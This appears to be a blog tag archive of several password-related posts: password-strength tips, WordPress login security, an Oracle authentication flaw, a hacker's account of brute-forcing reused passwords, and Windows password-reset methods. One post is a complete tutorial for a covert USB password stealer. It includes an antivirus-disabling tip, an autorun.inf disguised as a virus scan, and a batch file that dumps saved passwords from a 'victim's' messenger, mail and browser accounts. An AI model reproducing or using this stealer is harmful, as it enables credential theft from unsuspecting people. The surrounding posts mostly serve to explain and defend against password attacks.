Posts Tagged ‘password’

You’ve probably heard that a strong password is really important to keep your accounts safe. You’ve also probably heard that people are still not creating good passwords. But even if you are—or at least you think you are—hackers are smart and they’ve figured out ingenious ways to crack what you think is a secure password.

Here’s how they do it:

Dashlane, a password manager tool, took a look at 61 million passwords from data breaches. These passwords were available to hackers, of course, but also to the public and even security researchers. To the surprise of precisely nobody, the biggest takeaway was that people’s passwords were far from original, and most of them were actually the same.

The most popular passwords were “Ferrari,” “iloveyou,” “starwars,” and of course “password1234.”

If you’re a hacker, let’s be honest, these aren’t hard to guess. And, in fact, there are tools out there that will help make life even easier.

“John the Ripper”

One of the most common tools is “John the Ripper.” This tool uses what’s known as a “dictionary attack,” where it takes a list of dictionary words and uses them to crack passwords. The tool can try millions of words in a short space of time, and it can do sneaky things like replacing an “a” with an “@” or an “e” with “3.”

In short, if your password contains a real word of any kind, even an inexperienced hacker can use a tool to figure it out in seconds.

Password walking

One other thing Dashlane noticed was that many people thought they were being creative by using a tactic called “password walking.” Basically, this is when you “walk” your fingers across the keyboard, hitting keys that are adjacent. This creates a password that looks unique and random, like “zxcvbn,” “1q2w3e4r,” or ‘poiuytr.”

While you might think a password such as this is secure, hackers know people use these tricks and can plug in any number of variations into their tools and test them out. Once again, in a matter of moments, a hacker will figure out your password.

Password formula

Some may think that a password formula based on the name of the particular website you are using is a smart idea. But, again, it’s hard to trick a hacker. This is especially true if a hacker figures out your “base password” (the part of your password that you use over and over again…another common tactic). They’ll then use that and try different variations, or other common combinations, to piece the puzzle together.

Let’s imagine, for instance, that you use the password “Porsche3$5^” for Twitter and “Porsche4%6&” for Facebook. All you did was change the second half and then went “password walking.” This is child’s play for hackers.

“How to hack passwords,” from a hacker himself

Here’s what goes on in the mind of a hacker, according to a person who has hacked thousands of accounts and documented his tactics on Lifehacker.

Follow his logic in this section taken from his article:

  • You probably use the same password for lots of stuff right?
  • Some sites you access such as your Bank or work VPN probably have pretty decent security, so I’m not going to attack them.
  • However, other sites like the Hallmark e-mail greeting cards site, an online forum you frequent, or an e-commerce site you’ve shopped at might not be as well prepared. So those are the ones I’d work on.
  • So, all we have to do now is unleash Brutus, wwwhack, or THC Hydra on their server with instructions  to try say 10,000 (or 100,000 – whatever makes you happy) different usernames and passwords as fast as possible.
  • Once we’ve got several login+password pairings we can then go back and test them on targeted sites.
  • But wait… How do I know which bank you use and what your login ID is for the sites you frequent? All those cookies are simply stored, unencrypted and nicely named, in your Web browser’s cache.

From this, you can see how the mind of a hacker works. And also how sophisticated (yet kind of simple) it is for them to figure things out.

And what’s not mentioned in this segment is the part your social media channels play—you know, where you talk about your favourite dog “Chappy” or your kid’s birthdate. Odds are, you probably use these personal details in your passwords. So, a quick search on Facebook and a hacker can find a few good words and numbers to plug into their hacking tool and figure out some viable options.

The moral of the story is this: Stop trying to come up with clever passwords based on names, places, or things in your life. Instead, use a password manager which automatically will create random passwords for all of your accounts. For example, my password manager just generated “ppwjK!C$p8g^2B” which is ridiculously strong and is highly unlikely to be guessed. And the added benefit is a password manager will remember the passwords, so you don’t have to.

Also, make sure your password is long. Here’s an image that shows just how much easier it is for a hacker to crack a short password, and what a difference it makes using a variety of characters rather than just lowercase letters.

From that same Lifehacker article:

Pay particular attention to the difference between using only lowercase characters and using all possible characters (uppercase, lowercase, and special characters – like @#$%^&*). Adding just one capital letter and one asterisk would change the processing time for an 8 character password from 2.4 days to 2.1 centuries.

how to hack passwords

Though you cannot stop your important accounts from getting breached, which is up to the organizations and companies that own them, you can do something on your end to minimize the chance of your password being hacked.

Advertisements

tv-wordpress

 

WordPress is the most popular Content Management System (CMS) used to power digital assets of websites and blogs on the Internet.

In fact, about 75 million sites (representing about 26% of all sites) depend on WordPress to make their online presence known.

Because of its increasing popularity, WordPress powered platforms are normally targeted by malicious hacking attacks and other types of security vulnerabilities.

In early 2016, Wordfence, a site providing security plugin for WordPress users, reported over 6 million password attacks  targeting over 72,000 individual sites within a 16-hour period.

And, what’s the most vulnerable point in the security of any WordPress site?

Yes, you are right, it’s the P A S S W O R D.

If an unauthorized person is able to guess, crack, or retrieve your password, then you could be in for a long, very long day.

Currently, with the modern advancement in technology, password-cracking techniques have equally become better. Some passwords could be very easy for a computer to break and strenuous for a person to keep in memory or type.

One of the most advanced password cracking tools can attempt up to 350 billion password guesses every second.

So, creating unbreakable passwords is key to maintaining the security of your blog.

Here are some useful tips.

  1. Keep away from the world’s worst passwords

In the current digital age, having a password to access your online accounts is simply indispensable.

SplashData, which focuses on making password management software, compiled a list of commonly used passwords among Internet users. The company analyzed the data from more than 2 million passwords retrieved in 2015.

If this list contains the password or its related combinations you use for accessing your WordPress site, then move swiftly to a more secure one.

Here is a list of the 25 commonly used passwords:

Keep away from the world’s worst passwords

  1. Use a unique and creative password for your WordPress site

Do not make the fatal mistake of using the same password for your email account, social media accounts, and other places for accessing your WordPress website or blog.

Regurgitating your passwords is a risky affair you should avoid as plague. In case a malicious hacker discovers the password you use for one account, he or she could simply make your online life unbearable.

Desist from using names of places and dictionary words in your passwords. Currently, the methods of cracking passwords have advanced such that hackers are able to “brute force“; that is, try out different dictionary words and other common phrases to break the passwords.

Furthermore, to be unique, you can avoid using a password that’s related to your WordPress site and use a creative mixture of upper case and lower case letters, numbers, and symbols. This way, you will be making the work of someone trying to guess your password hard.

For instance, you can choose a random word or phrase and insert letters and numbers throughout it to increase complexity (such as “uTo7pyr$ll0%w4Ge”).

To make such complex passwords easier to remember but difficult for others to guess, you can take a sentence and convert it into a password by abbreviating words and creatively adding other memorable components.

For example, “I and my wife went for a holiday to Singapore for $3,500” could be “Iamww4@h2S4$35”. And, “Woohoo! I Blog Seven times a Week for money and fun” could translate to something like “WOO!IbG7#aWk4$+f”.

Here is how you can substitute some of the alphabets:

A= @

I= 1

L=!

o= 0 (zero)

S=$

Z= 2

Better still, you can use convenience software like LastPass and 1Password for remembering your strong, complex passwords.

As earlier mentioned here at Legit Blogger, avoid using commonly used words or sequential patterns that make the work of hackers easy.

The reason why “1qaz2wsx” made it to the list of the 25 worst passwords of 2015 (though it seems to be strong) is because it’s based on a sequential pattern of the initial two column keys on a standard computer keyboard.

So, better be safe than sorry and inject uniqueness and some creativity into your passwords.

  1. Do not fall prey of “phishing” attacks

If you receive an email from your hosting company or another source prompting you to change the login details of your cPanel, update the login details of your site, or provide other sensitive information, be careful before responding to such a message.

Before clicking on any links, ensure that the source is legitimate or you may fall a victim of a “phishing” attack.

If you provide your password details to a malicious website, a hacker could get hold of the information and make you curse, instead of blessing, your blogging life.

  1. Consider using WordPress security plugins

It prevents WordPress users with administrative access privileges from entering weak passwords. With this innovative plugin, a user can only publish posts, upload files, or edit posts only with a strong verified password.

These plugins will incorporate an additional layer of security to your WordPress blog by using a combination of two separate security credentials, for example, sending you a unique code to your mobile phone each time you want to log into your site, in addition to requiring you to enter your usual log in details.

As the name suggests, this innovative plugin will restrict the number of times a user can enter a password to gain access to a site. Therefore, someone trying to use a brute force attack to compromise your site has fewer chances.

With this powerful plugin, your WordPress site will be protected from malicious attacks by giving you frequent security updates, enforcing strong passwords, and accomplishing several other things.

  1. Length of password is key

The longer the password, the more secure it becomes in protecting your digital assets from malicious intrusions. It’s recommended to have passwords of at least 8 characters long. A good way to have longer passwords is to use passphrases.

Passphrases are just like passwords apart from being constructed from an unsystematic mixture of words, instead of just a single word. For example, press demonstrate blog million.

To create a passphrase, simply select a list of random numbers or use the free password creator tool. Thereafter, you can add some extra layer of robustness by a mixture of symbols, upper case letters, and lower case letters. Remember to avoid placing words in an easily predictable pattern and including easily identifiable phrases.

Furthermore, to have longer and stronger passwords, you can consider using a password manager. With such an application, you can safely create strong, lengthy passwords, which are kept in a secure database.

You can use a single passphrase to access the password manager; thereafter, the application will automatically enter your details on the login page of your WordPress site.

Because of the innovative capabilities of the password managers, it will not be necessary to remember your lengthy passwords every time you want to login into your site.

Click here for a list of the best passwords managers you can consider using.

  1. Keep your backup password options secure and up-to-date

Since WordPress.com uses your email address as the primary means of identification, you need to ensure that you frequently update your recovery email address.

Failure to keep the details of your email address up-to-date and secure could make an attacker to easily reset your passwords and login to your WordPress site.

Most free email service providers, such as Gmail and Yahoo mail, have a multi-factor authentication process.

When you enable this feature on your email account, you will be required to enter a short code sent to your mobile device and answer a series of security questions before accessing your account from an unrecognized device.

This way, the possibility of your account going into the wrong hands is greatly reduced.

  1. Be proactive
  • After creating a password, check its strength using this free tool. If it’s weak, you may continue modifying it until you get something solid.
  • Change your WordPress login details as frequently as possible. Using “Admin” as username and the name of your site as the password without frequently making improvements could land you into the land controlled by hackers.
  • Do not dish your passwords to anyone, even your “close” friends. You may never know how much they are concerned about the security of your site.
  • If you have to send your passwords through email, use a secure method of transmission such as com and select the password expiry time. If you send naked passwords through emails, which are rarely encrypted, the bad guys could get old of them.
  • When on a public computer, avoid saving your passwords or using the “Remember Me” feature, Further, watch out for people trying to look at your screen over your shoulder and remember to log out or close down your computer after you have finished your work.

Conclusion

Having your site compromised by an attacker is a horror that few webmasters are prepared to endure. Ensuring that your site is up and running normally after a successful attack requires thick skin, patience, and money.

Nonetheless, security issues are vital for the optimal performance of any WordPress website or blog. Therefore, instituting ample security measures beforehand is normally better than tackling the aftermath.

Fortunately, the robust WordPress platform, which is trusted by a large number of site owners, is generally very safe. And, one of the vital ways of keeping a WordPress site free from attackers is by vigilantly using strong and secure passwords.

Caintech.co.uk

This post is of-course for educational purposes only.

Although the title of this post implies that this is designed for a USB, any device like an MP3 player or a mobile phone can be used as they can all execute programs.

We know that windows stores most of its passwords on daily basis , such as MSN messenger passwords,Yahoo passwords,Facebook passwords etc. Most people hate to type passwords over and over again; so when that little tick box appears that asks to save/remember password the opportunity is jumped at, this shall be their undoing.

 

Things you will need?
Note: Before downloading the following apps you might want to disable your Anti Virus, as most of these will appear as a suspicious file.

MessenPass – MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:

  • MSN Messenger
  • Windows Messenger (In Windows XP)
  • Windows Live Messenger (In Windows XP/Vista/7)
  • Yahoo Messenger (Versions 5.x and 6.x)
  • Google Talk
  • ICQ Lite 4.x/5.x/2003
  • AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro.
  • Trillian
  • Trillian Astra
  • Miranda
  • GAIM/Pidgin
  • MySpace IM
  • PaltalkScene
  • Digsby

Mail PassView – Mail PassView is a small password-recovery tool that reveals the passwords and other account details for:

  • Outlook Express
  • Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
  • Microsoft Outlook 2002/2003/2007/2010 (POP3, IMAP, HTTP and SMTP Accounts)
  • Windows Mail
  • Windows Live Mail
  • IncrediMail
  • Eudora
  • Netscape 6.x/7.x (If the password is not encrypted with master password)
  • Mozilla Thunderbird (If the password is not encrypted with master password)
  • Group Mail Free
  • Yahoo! Mail – If the password is saved in Yahoo! Messenger application.
  • Hotmail/MSN mail – If the password is saved in MSN/Windows/Live Messenger application.
  • Gmail – If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.

IE Passview – IE passview is a small program that helps us view stored passwords in Internet Explorer.

Protected storage pass viewer(PSPV) –  Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.

Password Fox – Password fox is a small program used to view Stored passwords in Mozilla Firefox

Now here is a step by step tutorial to create a USB password stealer to steal saved passwords:

1.First of all download all 5 tools and copy the executable files in your USB  i.e. Copy the files  mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it.

[autorun]

open=launch.bat

ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB

 

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt
Save the Notepad file and rename it from New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.
Now your USB Password stealer is ready, all you have to do is insert it in your victims computer and  a popup will appear, in the popup window select the option (Launch virus scan) as soon as you will click it the following window will appear.

After this you can see saved password in .TXT files on the USB
Have fun and hack responsibly

Oracle suffered with serious vulnerability in the authentication protocol used by some Oracle databases. This Flaw enables a remote attacker to brute-force a token provided by the server prior to authentication and determine a user’s password.

Martinez Fayo and his team first reported the bugs to Oracle in May 2010. Oracle fixed it in mid-2011 via the 11.2.0.3 patch set, issuing a new version of the protocol. “But they never fixed the current version, so the current 11.1 and 11.2 versions are still vulnerable,” Martinez Fayo says, and Oracle has no plans to fix the flaws for version 11.1.

The first step in the authentication process when a client contacts the database server is for the server to send a session key back to the client, along with a salt. The vulnerability enables an attacker to link a specific session key with a specific password hash.

There are no overt signs when an outsider has targeted the weakness, and attackers aren’t required to have “man-in-the-middle” control of a network to exploit it. “Once the attacker has a Session Key and a Salt (which is also sent by the server along with the session key), the attacker can perform a brute force attack on the session key by trying millions of passwords per second until the correct one is found. This is very similar to a SHA-1 password hash cracking. Rainbow tables can’ t be used because there is a Salt used for password hash generation, but advanced hardware can be used, like GPUs combined with advanced techniques like Dictionary hybrid attacks, which can make the cracking process much more efficient.”

I developed a proof-of-concept tool that shows that it is possible to crack an 8 characters long lower case alphabetic password in approximately 5 hours using standard CPUs.”

Because the vulnerability is in a widely deployed product and is easy to exploit, Fayo said he considers it to be quite dangerous.

 

This article was posted on onemansblog.com by John Pozadzides

If you invited me to try and crack your password, you know the one that you use over and over for like every web page you visit, how many guesses would it take before I got it?

Let’s see… here is my top 10 list. I can obtain most of this information much easier than you think, then I might just be able to get into your e-mail, computer, or online banking. After all, if I get into one I’ll probably get into all of them.

  1. Your partner, child, or pet’s name, possibly followed by a 0 or 1 (because they’re always making you use a number, aren’t they?)
  2. The last 4 digits of your social security number.
  3. 123 or 1234 or 123456.
  4. “password”
  5. Your city, or college, football team name.
  6. Date of birth – yours, your partner’s or your child’s.
  7. “god”
  8. “letmein”
  9. “money”
  10. “love”

Statistically speaking that should probably cover about 20% of you. But don’t worry. If I didn’t get it yet it will probably only take a few more minutes before I do…

Hackers, and I’m not talking about the ethical kind, have developed a whole range of tools to get at your personal data. And the main impediment standing between your information remaining safe, or leaking out, is the password you choose. (Ironically, the best protection people have is usually the one they take least seriously.)

One of the simplest ways to gain access to your information is through the use of a Brute Force Attack. This is accomplished when a hacker uses a specially written piece of software to attempt to log into a site using your credentials. Insecure.org has a list of the Top 10 FREE Password Crackers right here.

So, how would one use this process to actually breach your personal security? Simple. Follow my logic:

  • You probably use the same password for lots of stuff right?
  • Some sites you access such as your Bank or work VPN probably have pretty decent security, so I’m not going to attack them.
  • However, other sites like the Hallmark e-mail greeting cards site, an online forum you frequent, or an e-commerce site you’ve shopped at might not be as well prepared. So those are the ones I’d work on.
  • So, all we have to do now is unleash Brutus, wwwhack, or THC Hydra on their server with instructions to try say 10,000 (or 100,000 – whatever makes you happy) different usernames and passwords as fast as possible.
  • Once we’ve got several login+password pairings we can then go back and test them on targeted sites.
  • But wait… How do I know which bank you use and what your login ID is for the sites you frequent? All those cookies are simply stored, unencrypted and nicely named, in your Web browser’s cache. (Read this post to remedy that problem.)

And how fast could this be done? Well, that depends on three main things, the length and complexity of your password, the speed of the hacker’s computer, and the speed of the hacker’s Internet connection.

Assuming the hacker has a reasonably fast connection and PC here is an estimate of the amount of time it would take to generate every possible combination of passwords for a given number of characters. After generating the list it’s just a matter of time before the computer runs through all the possibilities – or gets shut down trying.

Pay particular attention to the difference between using only lowercase characters and using all possible characters (uppercase, lowercase, and special characters – like @#$%^&*). Adding just one capital letter and one asterisk would change the processing time for an 8 character password from 2.4 days to 2.1 centuries.

Password Length All Characters Only Lowercase
3 characters
4 characters
5 characters
6 characters
7 characters
8 characters
9 characters
10 characters
11 characters
12 characters
13 characters
14 characters
0.86 seconds
1.36 minutes
2.15 hours
8.51 days
2.21 years
2.10 centuries
20 millennia
1,899 millennia
180,365 millennia
17,184,705 millennia
1,627,797,068 millennia
154,640,721,434 millennia
0.02 seconds
.046 seconds
11.9 seconds
5.15 minutes
2.23 hours
2.42 days
2.07 months
4.48 years
1.16 centuries
3.03 millennia
78.7 millennia
2,046 millennia

Remember, these are just for an average computer, and these assume you aren’t using any word in the dictionary. If Google put their computer to work on it they’d finish about 1,000 times faster.

Now, I could go on for hours and hours more about all sorts of ways to compromise your security and generally make your life miserable – but 95% of those methods begin with compromising your weak password. So, why not just protect yourself from the start and sleep better at night?

Believe me, I understand the need to choose passwords that are memorable. But if you’re going to do that how about using something that no one is ever going to guess AND doesn’t contain any common word or phrase in it.

Here are some password tips:

  1. Randomly substitute numbers for letters that look similar. The letter ‘o’ becomes the number ’0′, or even better an ‘@’ or ‘*’. (i.e. – m0d3ltf0rd… like modelTford)
  2. Randomly throw in capital letters (i.e. – Mod3lTF0rd)
  3. Think of something you were attached to when you were younger, but DON’T CHOOSE A PERSON’S NAME! Every name plus every word in the dictionary will fail under a simple brute force attack.
  4. Maybe a place you loved, or a specific car, an attraction from a vacation, or a favorite restaurant?
  5. You really need to have different username / password combinations for everything. Remember, the technique is to break into anything you access just to figure out your standard password, then compromise everything else. This doesn’t work if you don’t use the same password everywhere.
  6. Since it can be difficult to remember a ton of passwords, I recommend using Roboform for Windows users. It will store all of your passwords in an encrypted format and allow you to use just one master password to access all of them. It will also automatically fill in forms on Web pages, and you can even get versions that allow you to take your password list with you on your PDA, phone or a USB key. If you’d like to download it without having to navigate their web site here is the direct download link.
  7. Mac users can use 1Password. It is essentially the same thing as Roboform, except for Mac, and they even have an iPhone application so you can take them with you too.
  8. Once you’ve thought of a password, try Microsoft’s password strength tester to find out how secure it is.

By request I also created a short RoboForm Tutorial. Hope it helps…

Another thing to keep in mind is that some of the passwords you think matter least actually matter most. For example, some people think that the password to their e-mail box isn’t important because “I don’t get anything sensitive there.” Well, that e-mail box is probably connected to your online banking account. If I can compromise it then I can log into the Bank’s Web site and tell it I’ve forgotten my password to have it e-mailed to me. Now, what were you saying about it not being important?

Often times people also reason that all of their passwords and logins are stored on their computer at home, which is save behind a router or firewall device. Of course, they’ve never bothered to change the default password on that device, so someone could drive up and park near the house, use a laptop to breach the wireless network and then try passwords from this list until they gain control of your network – after which time they will own you!

Now I realize that every day we encounter people who over-exaggerate points in order to move us to action, but trust me this is not one of those times. There are 50 other ways you can be compromised and punished for using weak passwords that I haven’t even mentioned.

I also realize that most people just don’t care about all this until it’s too late and they’ve learned a very hard lesson. But why don’t you do me, and yourself, a favor and take a little action to strengthen your passwords and let me know that all the time I spent on this article wasn’t completely in vain.

If you liked John’s post you can listen to an interview with him on Connecticut Public Radio > HERE

We tend to forget our Windows administrator login password. With no way to get into the system, you can’t even perform basic maintenance, let alone a thorough tune-up. Formatting is always an option, but we consider that a last resort. (Plus, guess who’s going to have to help reinstall all the programs lost after a wipe?) But all hope is not lost. There are a few ways to actually retrieve a lost Windows account password. Read on, and we’ll show you the light.

When we install Windows, it automatically creates an account “Administrator” and sets its password to blank. So if you have forget your user account password then try this:

Start system and when you see Windows Welcome screen / Login screen, press Ctrl +Alt +Del keys twice and it’ll show Classic Login box. Now type “Administrator” (without quotes) in Username and leave Password field blank. Now press Enter and you should be able to log in Windows.

Now you can reset your account password from “Control Panel -> User Accounts”.
Same thing can be done using Safe Mode. In Safe Mode Windows will show this in-built Administrator account in Login screen.

If you sure that you had completely no idea what your password is, then keep trying these methods.

Method 1: Take a rest

Sometimes, human being is a little weird. You won’t get the thing that you urgently need. So have a coffee, take a snap or even come back after a few days, you may found that you suddenly ‘remember’ your Windows password.

Method 2: Reset password with RESET DISK if you made before.

Windows XP and further versions also provide another method to recover forgotten password by using “Reset Disk”. If you created a Password Reset Disk in past, you can use that disk to reset the password. To know more about it, please visit following links:
http://support.microsoft.com/kb/305478

Method 3: Reset password from another administrator account

If you cannot log on to Windows by using a particular user account, but you can log on to another account that has administrative credentials, follow these steps on how to do the trick:

1.      Log on to Windows by using an administrator account that has a password that you remember. You may need to start WinXP in safe mode.

2.      Click Start, and then click Run.

3.      In the Open box, type “control userpasswords2”, and then click OK.

4.      Click the user account that you forgot the password for, and then click Reset Password.

5.      Type a new password in both the new password and the Confirm new password boxes, and then click OK.

Method 4: TRY command prompt about password reset trick

1. Log in with any valid account.

2. Bring up the command prompt.

Type: net user

You get a list of accounts

Type: net user Administrator *

Type: net user (any account on that list) *

3. It prompts for a password. Enter one, then enter it again when prompted to confirm.

Now, try to log on as ‘Administrator’ with your new password.
* Please note that this might not work on a LIMITED account

Method 5: Make third party recovery tool yourself

There are a lot of tools and utilities that can be downloaded and used to recover, reset, retrieve or reveal existing password. These windows password recovery utilities, free or paid, are usually a Linux boot disk or CD that able to comes with NT file system (NTFS) drivers and software that will read the registry and rewrite the password hashes, or can brute force crack the password for any user account including the Administrators. The advantage is that there is no fear of leaking your password to outsiders, while the process requires physical access to the console and a floppy or CD drive, depending on which tool you choose. And it’s not easy, although it always work!

Below is the most famous recovery tool I found:

Windows Password Recovery Tool 3.0 – it is the most popular Windows password cracker . It is a very efficient implementation of windows any versions. It comes with a Graphical User Interface and runs on multiple platforms.

For more information:
http://www.windowspasswordsrecovery.com

Password Recovery Bundle –This is a utility to reset the password of any user that has a valid (local) account on your windows system. You do not need to know the old password to set a new one. It works offline, that is, you have to shutdown your computer and boot off a floppydisk or CD. It’ll detect and offer to unlock locked or disabled out user accounts. It is also an almost fully functional registry editor.

For more information:
http://www.recoverlostpassword.com

Windows Password Key 8.0 -It is considered as the best tool to reset local administrator and user passwords on any Windows system. It creates a password recovery CD/DVD, USB Flash Drive for home, business and enterprise. And most of all, it’s the most popular and safe solution for removing your Windows password until now.

For more information:
http://www.lostwindowspassword.com

Method 6: Make a Wish!
If it doesn’t work above, I hope that you have some hacker friends.